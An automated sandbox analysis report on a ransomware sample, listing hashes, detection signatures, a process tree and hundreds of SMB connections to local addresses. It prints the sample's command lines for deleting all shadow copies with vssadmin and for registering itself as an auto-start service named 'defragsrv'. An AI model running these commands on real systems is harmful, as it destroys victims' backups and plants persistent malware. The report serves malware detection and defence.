Loading ...

Play interactive tourEdit tour

Analysis Report 3PSo7GcHhV.exe

Overview

General Information

Sample Name:3PSo7GcHhV.exe
Analysis ID:426176
MD5:8856669b9a76eeb19e5673db6c4491ab
SHA1:2d328721640ebb3ddeb971316141fd2b3a84ae84
SHA256:edf9912bf2c8c7d9048bc6322900231810de7cc34267acc12e1a256fbecdbbdf
Tags:RansomwareTeslaRVNG2
Infos:

Most interesting Screenshot:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Changes security center settings (notifications, updates, antivirus, firewall)
Connects to many different private IPs (likely to spread or exploit)
Connects to many different private IPs via SMB (likely to spread or exploit)
Deletes shadow drive data (may be related to ransomware)
May disable shadow drive data (uses vssadmin)
Protects its processes via BreakOnTermination flag
Sigma detected: Copying Sensitive Files with Credential Data
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Enables security privileges
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 3PSo7GcHhV.exe (PID: 5556 cmdline: 'C:\Users\user\Desktop\3PSo7GcHhV.exe' MD5: 8856669B9A76EEB19E5673DB6C4491AB)
    • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 5420 cmdline: 'C:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= auto MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 6056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6052 cmdline: 'c:\windows\system32\cmd.exe' /c c:\windows\logg.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vssadmin.exe (PID: 5704 cmdline: 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /Quiet MD5: 47D51216EF45075B5F7EAA117CC70E40)
      • conhost.exe (PID: 4084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 8036 cmdline: 'c:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= auto MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 8120 cmdline: 'c:\windows\system32\sc.exe' start defragsrv MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5956 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • VSSVC.exe (PID: 1124 cmdline: C:\Windows\system32\vssvc.exe MD5: C7053D974A35EAB81F153FF33C883613)
  • svchost.exe (PID: 7208 cmdline: C:\Windows\System32\svchost.exe -k swprv MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 3PSo7GcHhV.exe (PID: 5580 cmdline: C:\Users\user\Desktop\3PSo7GcHhV.exe MD5: 8856669B9A76EEB19E5673DB6C4491AB)
  • svchost.exe (PID: 8040 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 8144 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1240 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2024 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5484 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 592 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6156 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 4572 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5608 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 1092 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 1084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6344 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Shadow Copies Deletion Using Operating Systems UtilitiesShow sources
Source: Process startedAuthor: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /Quiet, CommandLine: 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /Quiet, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: 'C:\Users\user\Desktop\3PSo7GcHhV.exe' , ParentImage: C:\Users\user\Desktop\3PSo7GcHhV.exe, ParentProcessId: 5556, ProcessCommandLine: 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /Quiet, ProcessId: 5704
Sigma detected: Copying Sensitive Files with Credential DataShow sources
Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /Quiet, CommandLine: 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /Quiet, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: 'C:\Users\user\Desktop\3PSo7GcHhV.exe' , ParentImage: C:\Users\user\Desktop\3PSo7GcHhV.exe, ParentProcessId: 5556, ProcessCommandLine: 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /Quiet, ProcessId: 5704
Sigma detected: New Service CreationShow sources
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: 'C:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= auto, CommandLine: 'C:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= auto, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: 'C:\Users\user\Desktop\3PSo7GcHhV.exe' , ParentImage: C:\Users\user\Desktop\3PSo7GcHhV.exe, ParentProcessId: 5556, ProcessCommandLine: 'C:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= auto, ProcessId: 5420

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 3PSo7GcHhV.exeVirustotal: Detection: 62%Perma Link
Source: 3PSo7GcHhV.exeMetadefender: Detection: 34%Perma Link
Source: 3PSo7GcHhV.exeReversingLabs: Detection: 65%

Exploits:

barindex
Connects to many different private IPs (likely to spread or exploit)Show sources
Source: global trafficTCP traffic: 192.168.2.148:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.149:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.146:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.147:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.140:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.141:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.144:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.145:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.142:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.143:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.159:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.157:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.158:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.151:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.152:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.150:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.155:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.156:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.153:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.154:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.126:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.127:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.124:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.125:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.128:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.129:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.122:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.123:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.120:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.121:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.137:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.138:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.135:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.136:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.139:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.130:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.133:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.134:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.131:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.132:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.225:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.226:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.223:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.224:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.229:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.227:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.228:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.221:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.222:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.220:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.230:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.231:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.203:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.204:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.201:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.202:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.207:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.208:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.205:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.206:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.200:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.209:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.214:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.215:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.212:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.213:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.218:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.219:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.216:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.217:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.210:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.211:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.0:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.180:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.181:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.184:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.185:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.182:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.183:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.188:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.189:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.186:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.187:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.191:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.192:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.190:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.195:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.196:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.193:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.194:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.199:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.197:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.198:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.168:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.169:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.162:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.163:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.160:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.161:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.166:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.167:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.164:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.165:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.170:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.179:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.173:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.174:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.171:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.172:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.177:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.178:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.175:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.176:445Jump to behavior
Connects to many different private IPs via SMB (likely to spread or exploit)Show sources
Source: global trafficTCP traffic: 192.168.2.148:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.149:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.146:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.147:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.140:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.141:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.144:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.145:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.142:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.143:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.159:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.157:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.158:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.151:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.152:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.150:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.155:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.156:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.153:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.154:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.126:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.127:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.124:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.125:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.128:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.129:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.122:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.123:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.120:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.121:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.137:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.138:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.135:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.136:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.139:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.130:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.133:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.134:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.131:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.132:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.225:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.226:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.223:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.224:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.229:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.227:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.228:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.221:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.222:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.220:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.230:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.231:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.203:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.204:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.201:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.202:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.207:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.208:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.205:445Jump to behavior
Source: global trafficTCP traffic: 192.168.2.206:445Jump to behavior
